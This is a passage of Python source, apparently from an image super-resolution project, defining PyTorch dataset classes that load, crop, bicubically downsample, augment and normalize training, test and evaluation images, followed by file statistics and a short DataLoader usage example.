return len(self.image_filenames)
class Data_name(data.Dataset):
def __init__(self, image_dir, image_dir_ref, patch_size, upscale_factor, data_augmentation, normalize, transform=None):
super(Data_name, self).__init__()
self.image_filenames = image_dir
self.image_filenames_ref = image_dir_ref
self.patch_size = patch_size
self.upscale_factor = upscale_factor
self.transform = transform
self.data_augmentation = data_augmentation
self.normalize = normalize
def __getitem__(self, index):
target = load_img(self.image_filenames)
_, file = os.path.split(self.image_filenames)
target = target.crop((0, 0, target.size[0] // self.upscale_factor * self.upscale_factor, target.size[1] // self.upscale_factor * self.upscale_factor))
input = target.resize((int(target.size[0]/self.upscale_factor),int(target.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic = rescale_img(input, self.upscale_factor)
target_ref = load_img(self.image_filenames_ref)
_, file_ref = os.path.split(self.image_filenames_ref)
target_ref = target_ref.crop((0, 0, target_ref.size[0] // self.upscale_factor * self.upscale_factor, target_ref.size[1] // self.upscale_factor * self.upscale_factor))
input_ref = target_ref.resize((int(target_ref.size[0]/self.upscale_factor),int(target_ref.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic_ref = rescale_img(input_ref, self.upscale_factor)
input, target, bicubic, input_ref, target_ref, bicubic_ref, _ = get_patch_ref(input,target,bicubic,input_ref,target_ref,bicubic_ref,self.patch_size, self.upscale_factor)
if self.data_augmentation:
input, target, bicubic, _ = augment(input, target, bicubic)
if self.transform:
input = self.transform(input)
bicubic = self.transform(bicubic)
target = self.transform(target)
input_ref = self.transform(input_ref)
bicubic_ref = self.transform(bicubic_ref)
target_ref = self.transform(target_ref)
if self.normalize:
input = input * 2 - 1
bicubic = bicubic * 2 - 1
target = target * 2 - 1
input_ref = input_ref * 2 - 1
bicubic_ref = bicubic_ref * 2 - 1
target_ref = target_ref * 2 - 1
return input, target, bicubic, input_ref, target_ref, bicubic_ref, file, file_ref
def __len__(self):
return len(self.image_filenames)
class Data_patch(data.Dataset):
def __init__(self, image_dir, patch_size, upscale_factor, data_augmentation, normalize, transform=None):
super(Data_patch, self).__init__()
self.image_filenames = [join(image_dir, x) for x in listdir(image_dir) if is_image_file(x)]
self.patch_size = patch_size
self.upscale_factor = upscale_factor
self.transform = transform
self.data_augmentation = data_augmentation
self.normalize = normalize
def __getitem__(self, index):
target = load_img(self.image_filenames[index])
_, file = os.path.split(self.image_filenames[index])
target = target.crop((0, 0, target.size[0] // self.upscale_factor * self.upscale_factor, target.size[1] // self.upscale_factor * self.upscale_factor))
input = target.resize((int(target.size[0]/self.upscale_factor),int(target.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic = rescale_img(input, self.upscale_factor)
input, target, bicubic, _ = get_patch(input,target,bicubic,self.patch_size, self.upscale_factor)
if self.data_augmentation:
input, target, bicubic, _ = augment(input, target, bicubic)
if self.transform:
input = self.transform(input)
bicubic = self.transform(bicubic)
target = self.transform(target)
if self.normalize:
input = input * 2 - 1
bicubic = bicubic * 2 - 1
target = target * 2 - 1
return input, target, bicubic
def __len__(self):
return len(self.image_filenames)
class Data_test(data.Dataset):
def __init__(self, image_dir, upscale_factor, normalize, transform=None):
super(Data_test, self).__init__()
self.image_filenames = [join(image_dir, x) for x in listdir(image_dir) if is_image_file(x)]
self.upscale_factor = upscale_factor
self.transform = transform
self.normalize = normalize
def __getitem__(self, index):
target = load_img(self.image_filenames[index])
_, file = os.path.split(self.image_filenames[index])
target = target.crop((0, 0, target.size[0] // self.upscale_factor * self.upscale_factor, target.size[1] // self.upscale_factor * self.upscale_factor))
input = target.resize((int(target.size[0]/self.upscale_factor),int(target.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic = rescale_img(input, self.upscale_factor)
if self.transform:
input = self.transform(input)
bicubic = self.transform(bicubic)
target = self.transform(target)
if self.normalize:
input = input * 2 - 1
bicubic = bicubic * 2 - 1
target = target * 2 - 1
return input, target, bicubic, file
def __len__(self):
return len(self.image_filenames)
class Data_eval(data.Dataset):
def __init__(self, image_dir, upscale_factor, normalize, transform=None):
super(Data_eval, self).__init__()
self.image_filenames = [join(image_dir, x) for x in listdir(image_dir) if is_image_file(x)]
self.upscale_factor = upscale_factor
        self.transform = transform
        self.normalize = normalize
def __getitem__(self, index):
input = load_img(self.image_filenames[index])
bicubic = rescale_img(input, self.upscale_factor)
_, file = os.path.split(self.image_filenames[index])
if self.transform:
input = self.transform(input)
bicubic = self.transform(bicubic)
        if self.normalize:
            # Data_eval has no ground-truth target image, so only the network
            # inputs are rescaled to the [-1, 1] range here.
            input = input * 2 - 1
            bicubic = bicubic * 2 - 1
return input, bicubic, file
def __len__(self):
return len(self.image_filenames) | 40.344051 | 177 | 0.629633 | 1,718 | 12,547 | 4.332945 | 0.077416 | 0.106529 | 0.11647 | 0.025793 | 0.86338 | 0.841349 | 0.830333 | 0.808033 | 0.797555 | 0.781166 | 0 | 0.015179 | 0.254403 | 12,547 | 311 | 178 | 40.344051 | 0.780545 | 0.018331 | 0 | 0.710526 | 0 | 0 | 0.008371 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092105 | false | 0 | 0.030702 | 0.026316 | 0.214912 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
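# Hedged usage sketch (not part of the original module; the dataset path is
# hypothetical): wiring Data_patch into a PyTorch DataLoader. torchvision's
# ToTensor is a typical choice for the 'transform' argument used above.
def _example_train_loader():
    from torch.utils.data import DataLoader
    from torchvision.transforms import ToTensor
    train_set = Data_patch('datasets/train_HR', patch_size=32, upscale_factor=4,
                           data_augmentation=True, normalize=True, transform=ToTensor())
    return DataLoader(train_set, batch_size=16, shuffle=True)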